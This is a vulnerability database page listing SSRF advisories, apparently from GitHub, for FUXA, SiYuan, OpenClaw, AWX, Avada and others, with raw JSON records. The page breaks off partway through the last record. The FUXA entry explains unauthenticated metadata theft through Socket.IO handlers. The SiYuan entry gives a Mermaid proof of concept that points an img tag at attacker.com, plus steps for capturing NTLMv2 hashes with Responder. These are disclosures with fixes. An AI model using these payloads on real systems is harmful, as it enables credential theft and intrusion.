CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4625 vulnerabilities reference this CWE, most recent first.
GHSA-W86F-RF9W-H3X6
Vulnerability from github – Published: 2026-06-08 23:06 – Updated: 2026-06-08 23:06Summary
An unauthenticated attacker (Alice) connects to FUXA's Socket.IO endpoint and emits a device-webapi-request event whose property.address field names an arbitrary URL. FUXA's DEVICE_WEBAPI_REQUEST handler at server/runtime/index.js:296 calls axios.get(address) server-side and broadcasts the full response body back on the same event via io.emit. The companion handler DEVICE_PROPERTY at server/runtime/index.js:153 has the same miss against OPC UA and ODBC endpoints. Both handlers skip the isSocketWriteAuthorized() check that the other write-capable events (DEVICE_VALUES at line 182, DEVICE_ENABLE at line 358) call. Alice reads cloud instance metadata, scans internal services, and connects to any OPC UA server or ODBC database the FUXA host can reach, then receives the results.
Details
Vulnerable handlers: server/runtime/index.js:153-171, 296-316:
socket.on(Events.IoEventTypes.DEVICE_PROPERTY, (message) => {
try {
if (message && message.endpoint && message.type) {
devices.getSupportedProperty(message.endpoint, message.type).then(result => {
message.result = result;
io.emit(Events.IoEventTypes.DEVICE_PROPERTY, message);
})
// ...
}
}
// ...
});
socket.on(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, (message) => {
try {
if (message && message.property) {
devices.getRequestResult(message.property).then(result => {
message.result = result;
io.emit(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, message);
})
// ...
}
}
// ...
});
Sink: server/runtime/devices/httprequest/index.js:471 for the webapi path:
if (property.method === 'GET') {
axios.get(property.address).then(res => {
resolve(res.data);
// ...
Alice fully controls property.address, and io.emit echoes the response body back on the same event. For the ODBC variant, server/runtime/devices/odbc/index.js builds the connection string from endpoint.address plus endpoint.uid and endpoint.pwd, so Alice supplies credentials and targets any reachable ODBC server.
Contrast: server/runtime/index.js:182 (the DEVICE_VALUES write handler) gates the exact same kind of action behind isSocketWriteAuthorized(socket). The two handlers above skip that check.
Reachability: neither handler performs any authorization check, so both modes reach the sinks. secureEnabled=true does not close the gap because the Socket.IO connect block at server/runtime/index.js:114-120 auto-issues a guest token to any client that connects without one, and the handlers run regardless of socket.isAuthenticated. This is the same pattern GHSA-vwcg-c828-9822's note warned about: enabling authentication does not mitigate the missing check here.
Impact
Alice uses FUXA as a read-SSRF oracle against any HTTP(S) service the FUXA host can reach, with the response body delivered back to her Socket.IO session. On cloud-hosted SCADA deployments this exfiltrates IAM credentials from the instance metadata service. On OT networks it reaches internal OPC UA servers, ODBC databases, and administrative consoles that have no other external exposure. The ODBC variant accepts attacker-supplied credentials, so Alice authenticates to any ODBC server that trusts connections from the FUXA host. The attack works against secureEnabled=true deployments as well as the default; no operator interaction required.
CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N (High, 8.2). CWE-918.
Recommended Fix
Add the existing isSocketWriteAuthorized(socket) check at the top of both handlers, matching the pattern used by DEVICE_VALUES and DEVICE_ENABLE. Also switch io.emit to socket.emit so the response scopes to the requesting socket instead of broadcasting to every connected client. For defense in depth, validate property.address against an allowlist of schemes and reject private, loopback, and link-local address ranges before calling axios.get or the device connect paths.
socket.on(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, (message) => {
try {
if (!isSocketWriteAuthorized(socket)) {
logger.warn(`${Events.IoEventTypes.DEVICE_WEBAPI_REQUEST}: unauthorized request from ${socket.userId || 'guest'}`);
return;
}
if (message && message.property) {
// ... validate property.address against allowlist ...
devices.getRequestResult(message.property).then(result => {
message.result = result;
socket.emit(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, message);
})
// ...
}
}
// ...
});
Apply the same three changes (auth check, socket.emit, address validation) to DEVICE_PROPERTY.
A fix is available at https://github.com/frangoteam/FUXA/releases/tag/v1.3.2.
Found by aisafe.io
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "fuxa-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.1.14-1243"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47719"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-08T23:06:40Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nAn unauthenticated attacker (Alice) connects to FUXA\u0027s Socket.IO endpoint and emits a `device-webapi-request` event whose `property.address` field names an arbitrary URL. FUXA\u0027s `DEVICE_WEBAPI_REQUEST` handler at `server/runtime/index.js:296` calls `axios.get(address)` server-side and broadcasts the full response body back on the same event via `io.emit`. The companion handler `DEVICE_PROPERTY` at `server/runtime/index.js:153` has the same miss against OPC UA and ODBC endpoints. Both handlers skip the `isSocketWriteAuthorized()` check that the other write-capable events (`DEVICE_VALUES` at line 182, `DEVICE_ENABLE` at line 358) call. Alice reads cloud instance metadata, scans internal services, and connects to any OPC UA server or ODBC database the FUXA host can reach, then receives the results.\n\n## Details\n\n**Vulnerable handlers**: `server/runtime/index.js:153-171, 296-316`:\n\n```javascript\nsocket.on(Events.IoEventTypes.DEVICE_PROPERTY, (message) =\u003e {\n try {\n if (message \u0026\u0026 message.endpoint \u0026\u0026 message.type) {\n devices.getSupportedProperty(message.endpoint, message.type).then(result =\u003e {\n message.result = result;\n io.emit(Events.IoEventTypes.DEVICE_PROPERTY, message);\n })\n // ...\n }\n }\n // ...\n});\n\nsocket.on(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, (message) =\u003e {\n try {\n if (message \u0026\u0026 message.property) {\n devices.getRequestResult(message.property).then(result =\u003e {\n message.result = result;\n io.emit(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, message);\n })\n // ...\n }\n }\n // ...\n});\n```\n\n**Sink**: `server/runtime/devices/httprequest/index.js:471` for the webapi path:\n\n```javascript\nif (property.method === \u0027GET\u0027) {\n axios.get(property.address).then(res =\u003e {\n resolve(res.data);\n // ...\n```\n\nAlice fully controls `property.address`, and `io.emit` echoes the response body back on the same event. For the ODBC variant, `server/runtime/devices/odbc/index.js` builds the connection string from `endpoint.address` plus `endpoint.uid` and `endpoint.pwd`, so Alice supplies credentials and targets any reachable ODBC server.\n\n**Contrast**: `server/runtime/index.js:182` (the DEVICE_VALUES write handler) gates the exact same kind of action behind `isSocketWriteAuthorized(socket)`. The two handlers above skip that check.\n\nReachability: neither handler performs any authorization check, so both modes reach the sinks. `secureEnabled=true` does not close the gap because the Socket.IO connect block at `server/runtime/index.js:114-120` auto-issues a guest token to any client that connects without one, and the handlers run regardless of `socket.isAuthenticated`. This is the same pattern GHSA-vwcg-c828-9822\u0027s note warned about: enabling authentication does not mitigate the missing check here.\n\n\n## Impact\n\nAlice uses FUXA as a read-SSRF oracle against any HTTP(S) service the FUXA host can reach, with the response body delivered back to her Socket.IO session. On cloud-hosted SCADA deployments this exfiltrates IAM credentials from the instance metadata service. On OT networks it reaches internal OPC UA servers, ODBC databases, and administrative consoles that have no other external exposure. The ODBC variant accepts attacker-supplied credentials, so Alice authenticates to any ODBC server that trusts connections from the FUXA host. The attack works against `secureEnabled=true` deployments as well as the default; no operator interaction required.\n\n**CVSS 3.1**: `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N` (High, 8.2). CWE-918.\n\n## Recommended Fix\n\nAdd the existing `isSocketWriteAuthorized(socket)` check at the top of both handlers, matching the pattern used by `DEVICE_VALUES` and `DEVICE_ENABLE`. Also switch `io.emit` to `socket.emit` so the response scopes to the requesting socket instead of broadcasting to every connected client. For defense in depth, validate `property.address` against an allowlist of schemes and reject private, loopback, and link-local address ranges before calling `axios.get` or the device connect paths.\n\n```javascript\nsocket.on(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, (message) =\u003e {\n try {\n if (!isSocketWriteAuthorized(socket)) {\n logger.warn(`${Events.IoEventTypes.DEVICE_WEBAPI_REQUEST}: unauthorized request from ${socket.userId || \u0027guest\u0027}`);\n return;\n }\n if (message \u0026\u0026 message.property) {\n // ... validate property.address against allowlist ...\n devices.getRequestResult(message.property).then(result =\u003e {\n message.result = result;\n socket.emit(Events.IoEventTypes.DEVICE_WEBAPI_REQUEST, message);\n })\n // ...\n }\n }\n // ...\n});\n```\n\nApply the same three changes (auth check, `socket.emit`, address validation) to `DEVICE_PROPERTY`.\n\n---\nA fix is available at https://github.com/frangoteam/FUXA/releases/tag/v1.3.2.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
"id": "GHSA-w86f-rf9w-h3x6",
"modified": "2026-06-08T23:06:40Z",
"published": "2026-06-08T23:06:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/frangoteam/FUXA/security/advisories/GHSA-w86f-rf9w-h3x6"
},
{
"type": "PACKAGE",
"url": "https://github.com/frangoteam/FUXA"
},
{
"type": "WEB",
"url": "https://github.com/frangoteam/FUXA/releases/tag/v1.3.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "FUXA: Unauthenticated SSRF via Socket.IO DEVICE_WEBAPI_REQUEST and DEVICE_PROPERTY with response reading"
}
GHSA-W89J-GJ5W-5G57
Vulnerability from github – Published: 2024-03-28 06:30 – Updated: 2026-04-28 21:34Server-Side Request Forgery (SSRF) vulnerability in ThemeFusion Avada.This issue affects Avada: from n/a through 7.11.1.
{
"affected": [],
"aliases": [
"CVE-2023-39313"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-28T06:15:09Z",
"severity": "HIGH"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in ThemeFusion Avada.This issue affects Avada: from n/a through 7.11.1.",
"id": "GHSA-w89j-gj5w-5g57",
"modified": "2026-04-28T21:34:22Z",
"published": "2024-03-28T06:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39313"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/avada/wordpress-avada-theme-7-11-1-authenticated-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W89V-W2PQ-CC25
Vulnerability from github – Published: 2026-04-01 18:36 – Updated: 2026-04-01 18:36Improper input validation in the gateway health check feature in Devolutions Server allows a low-privileged authenticated user to perform server-side request forgery (SSRF), potentially leading to information disclosure, via a crafted API request. This issue affects Server: from 2026.1.1 through 2026.1.11, from 2025.3.1 through 2025.3.17.
{
"affected": [],
"aliases": [
"CVE-2026-4989"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-01T16:23:51Z",
"severity": "MODERATE"
},
"details": "Improper input validation in the gateway health check feature in Devolutions Server allows a low-privileged authenticated user to perform server-side request forgery (SSRF), potentially leading to information disclosure, via a crafted API request.\nThis issue affects Server: from 2026.1.1 through 2026.1.11, from 2025.3.1 through 2025.3.17.",
"id": "GHSA-w89v-w2pq-cc25",
"modified": "2026-04-01T18:36:37Z",
"published": "2026-04-01T18:36:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4989"
},
{
"type": "WEB",
"url": "https://devolutions.net/security/advisories/DEVO-2026-0010"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W8G9-X8GX-CRMM
Vulnerability from github – Published: 2026-04-09 17:36 – Updated: 2026-05-06 02:41Impact
Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable.
Strict browser SSRF checks could miss Playwright request-time navigation to private targets.
OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.
Affected Packages / Versions
- Package:
openclaw(npm) - Affected versions:
2026.3.8 - Patched versions:
2026.4.8
Fix
The issue was fixed on main and is available in the patched npm version listed above. The verified fixed tree is commit d7c3210cd6f5fdfdc1beff4c9541673e814354d5.
Verification
The fix was re-checked against main before publication, including targeted regression tests for the affected security boundary.
Credits
Thanks @smaeljaish771 for reporting.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.4.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42430"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-09T17:36:59Z",
"nvd_published_at": "2026-04-28T19:37:46Z",
"severity": "MODERATE"
},
"details": "## Impact\n\nStrict browser SSRF bypass in Playwright redirect handling leaves private targets reachable.\n\nStrict browser SSRF checks could miss Playwright request-time navigation to private targets.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.3.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.",
"id": "GHSA-w8g9-x8gx-crmm",
"modified": "2026-05-06T02:41:21Z",
"published": "2026-04-09T17:36:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42430"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable"
}
GHSA-W8HR-79RX-368J
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-20 15:31Hyland Alfresco Transformation Service allows unauthenticated attackers to achieve remote code execution through the argument injection vulnerability, which exists in the document processing functionality.
{
"affected": [],
"aliases": [
"CVE-2026-26339"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T18:25:00Z",
"severity": "CRITICAL"
},
"details": "Hyland Alfresco Transformation Service allows unauthenticated attackers to achieve remote code execution through the argument injection vulnerability, which exists in the document processing functionality.",
"id": "GHSA-w8hr-79rx-368j",
"modified": "2026-02-20T15:31:00Z",
"published": "2026-02-19T18:31:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26339"
},
{
"type": "WEB",
"url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551"
},
{
"type": "WEB",
"url": "https://www.hyland.com/en/solutions/products/alfresco-platform"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/hyland-alfresco-transformation-service-argument-injection-rce"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-W8MW-5389-WG24
Vulnerability from github – Published: 2025-08-27 18:31 – Updated: 2026-04-01 18:35Server-Side Request Forgery (SSRF) vulnerability in solacewp Solace Extra allows Server Side Request Forgery. This issue affects Solace Extra: from n/a through 1.3.2.
{
"affected": [],
"aliases": [
"CVE-2025-58203"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-27T18:15:48Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in solacewp Solace Extra allows Server Side Request Forgery. This issue affects Solace Extra: from n/a through 1.3.2.",
"id": "GHSA-w8mw-5389-wg24",
"modified": "2026-04-01T18:35:58Z",
"published": "2025-08-27T18:31:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58203"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/solace-extra/vulnerability/wordpress-solace-extra-plugin-1-3-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W8QH-QH69-53CX
Vulnerability from github – Published: 2026-06-19 21:32 – Updated: 2026-06-19 21:32A flaw was found in the AWX GitHub webhook integration. When processing GitHub pull_request webhooks, the controller stores the pull_request.statuses_url value from the webhook payload without validating that it points to a trusted GitHub API endpoint. If a job template is configured with a GitHub Personal Access Token as its webhook credential, the controller later POSTs that token to the stored callback URL when posting job status updates. An attacker who can submit a correctly signed forged webhook using the job template's webhook_key can redirect the callback to an attacker-controlled URL and exfiltrate the configured GitHub PAT.
{
"affected": [],
"aliases": [
"CVE-2026-12726"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-19T19:16:27Z",
"severity": "MODERATE"
},
"details": "A flaw was found in the AWX GitHub webhook integration. When processing GitHub pull_request webhooks, the controller stores the pull_request.statuses_url value from the webhook payload without validating that it points to a trusted GitHub API endpoint. If a job template is configured with a GitHub Personal Access Token as its webhook credential, the controller later POSTs that token to the stored callback URL when posting job status updates. An attacker who can submit a correctly signed forged webhook using the job template\u0027s webhook_key can redirect the callback to an attacker-controlled URL and exfiltrate the configured GitHub PAT.",
"id": "GHSA-w8qh-qh69-53cx",
"modified": "2026-06-19T21:32:47Z",
"published": "2026-06-19T21:32:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12726"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-12726"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490796"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W8W4-463P-8PG7
Vulnerability from github – Published: 2024-09-04 09:30 – Updated: 2024-09-04 18:30Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz.
This issue affects Apache OFBiz: before 18.12.16.
Users are recommended to upgrade to version 18.12.16, which fixes the issue.
{
"affected": [],
"aliases": [
"CVE-2024-45507"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-04T09:15:04Z",
"severity": "HIGH"
},
"details": "Server-Side Request Forgery (SSRF), Improper Control of Generation of Code (\u0027Code Injection\u0027) vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 18.12.16.\n\nUsers are recommended to upgrade to version 18.12.16, which fixes the issue.",
"id": "GHSA-w8w4-463p-8pg7",
"modified": "2024-09-04T18:30:57Z",
"published": "2024-09-04T09:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45507"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/OFBIZ-13132"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/o90dd9lbk1hh3t2557t2y2qvrh92p7wy"
},
{
"type": "WEB",
"url": "https://ofbiz.apache.org/download.html"
},
{
"type": "WEB",
"url": "https://ofbiz.apache.org/security.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-W93P-5FM2-HQ67
Vulnerability from github – Published: 2023-01-26 21:30 – Updated: 2023-02-01 15:30An issue in the website background of taocms v3.0.2 allows attackers to execute a Server-Side Request Forgery (SSRF).
{
"affected": [],
"aliases": [
"CVE-2022-46998"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-26T21:18:00Z",
"severity": "CRITICAL"
},
"details": "An issue in the website background of taocms v3.0.2 allows attackers to execute a Server-Side Request Forgery (SSRF).",
"id": "GHSA-w93p-5fm2-hq67",
"modified": "2023-02-01T15:30:20Z",
"published": "2023-01-26T21:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46998"
},
{
"type": "WEB",
"url": "https://www.yuque.com/shiyi-5yjak/hx4unh/kgnanw3lt8wg1tx2#%20%E3%80%8Ataocms-3.0.2-ssrf%E3%80%8B"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-W95V-4H65-J455
Vulnerability from github – Published: 2026-04-10 19:21 – Updated: 2026-04-10 19:21SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.
On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.
Root Cause
Mermaid initialization at app/src/protyle/render/mermaidRender.ts lines 28 and 33:
mermaid.initialize({
securityLevel: "loose",
flowchart: {
htmlLabels: true,
},
});
SVG injection at line 101:
renderElement.lastElementChild.innerHTML = mermaidData.svg;
No DOMPurify or other sanitization between the Mermaid output and DOM insertion.
Mermaid v11.12.0 in "loose" mode strips active JavaScript (<script>, onerror, onload) but explicitly allows <img> tags with src attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.
The Electron main process at app/electron/main.js line 78 sets disable-web-security, and lines 319+ set webSecurity: false, nodeIntegration: true, contextIsolation: false on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.
Proof of Concept
Mermaid code block in a SiYuan note:
```mermaid
graph TD
A["<img src='//attacker.com/share/img.png'>"] --> B[Normal Node]
```
Rendered SVG output (verified with Mermaid CLI 11.12.0, securityLevel: "loose", htmlLabels: true):
<foreignObject>
<div xmlns="http://www.w3.org/1999/xhtml">
<span class="nodeLabel">
<p><img src="//attacker.com/share/img.png" style="..."></p>
</span>
</div>
</foreignObject>
What was stripped by Mermaid's internal sanitizer (verified): onerror, onload, all event handler attributes, <script> tags, file:// URLs.
What survived (verified): <img src="http://...">, <img src="//...">.
Attack steps:
1. Attacker creates a note or .sy export containing the Mermaid block above
2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger)
3. Victim imports the notebook or opens the shared note
4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML
5. Electron fetches //attacker.com/share/img.png
On Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker's SMB server.
On macOS/Linux: Electron makes an HTTP request to the attacker's server, leaking the victim's IP and confirming when the note was read.
Impact
Zero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim's machine.
No configuration changes required. The securityLevel: "loose" setting is hardcoded in SiYuan's Mermaid initialization.
Suggested Fix
Change Mermaid initialization to securityLevel: "strict". If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip <img> tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260407035653-2f416e5253f1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40107"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:21:44Z",
"nvd_published_at": "2026-04-09T21:16:12Z",
"severity": "HIGH"
},
"details": "SiYuan configures Mermaid.js with `securityLevel: \"loose\"` and `htmlLabels: true`. In this mode, `\u003cimg\u003e` tags with `src` attributes survive Mermaid\u0027s internal DOMPurify and land in SVG `\u003cforeignObject\u003e` blocks. The SVG is injected via `innerHTML` with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.\n\nOn Windows, a protocol-relative URL (`//attacker.com/image.png`) resolves as a UNC path (`\\\\attacker.com\\image.png`). Windows attempts SMB authentication automatically, sending the victim\u0027s NTLMv2 hash to the attacker.\n\n## Root Cause\n\nMermaid initialization at `app/src/protyle/render/mermaidRender.ts` lines 28 and 33:\n\n mermaid.initialize({\n securityLevel: \"loose\",\n flowchart: {\n htmlLabels: true,\n },\n });\n\nSVG injection at line 101:\n\n renderElement.lastElementChild.innerHTML = mermaidData.svg;\n\nNo DOMPurify or other sanitization between the Mermaid output and DOM insertion.\n\nMermaid v11.12.0 in \"loose\" mode strips active JavaScript (`\u003cscript\u003e`, `onerror`, `onload`) but explicitly allows `\u003cimg\u003e` tags with `src` attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.\n\nThe Electron main process at `app/electron/main.js` line 78 sets `disable-web-security`, and lines 319+ set `webSecurity: false`, `nodeIntegration: true`, `contextIsolation: false` on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.\n\n## Proof of Concept\n\nMermaid code block in a SiYuan note:\n\n ```mermaid\n graph TD\n A[\"\u003cimg src=\u0027//attacker.com/share/img.png\u0027\u003e\"] --\u003e B[Normal Node]\n ```\n\nRendered SVG output (verified with Mermaid CLI 11.12.0, `securityLevel: \"loose\"`, `htmlLabels: true`):\n\n \u003cforeignObject\u003e\n \u003cdiv xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\n \u003cspan class=\"nodeLabel\"\u003e\n \u003cp\u003e\u003cimg src=\"//attacker.com/share/img.png\" style=\"...\"\u003e\u003c/p\u003e\n \u003c/span\u003e\n \u003c/div\u003e\n \u003c/foreignObject\u003e\n\nWhat was stripped by Mermaid\u0027s internal sanitizer (verified): `onerror`, `onload`, all event handler attributes, `\u003cscript\u003e` tags, `file://` URLs.\n\nWhat survived (verified): `\u003cimg src=\"http://...\"\u003e`, `\u003cimg src=\"//...\"\u003e`.\n\nAttack steps:\n1. Attacker creates a note or .sy export containing the Mermaid block above\n2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger)\n3. Victim imports the notebook or opens the shared note\n4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML\n5. Electron fetches `//attacker.com/share/img.png`\n\nOn Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker\u0027s SMB server.\n\nOn macOS/Linux: Electron makes an HTTP request to the attacker\u0027s server, leaking the victim\u0027s IP and confirming when the note was read.\n\n## Impact\n\nZero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim\u0027s machine.\n\nNo configuration changes required. The `securityLevel: \"loose\"` setting is hardcoded in SiYuan\u0027s Mermaid initialization.\n\n## Suggested Fix\n\nChange Mermaid initialization to `securityLevel: \"strict\"`. If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip `\u003cimg\u003e` tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.",
"id": "GHSA-w95v-4h65-j455",
"modified": "2026-04-10T19:21:44Z",
"published": "2026-04-10T19:21:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40107"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
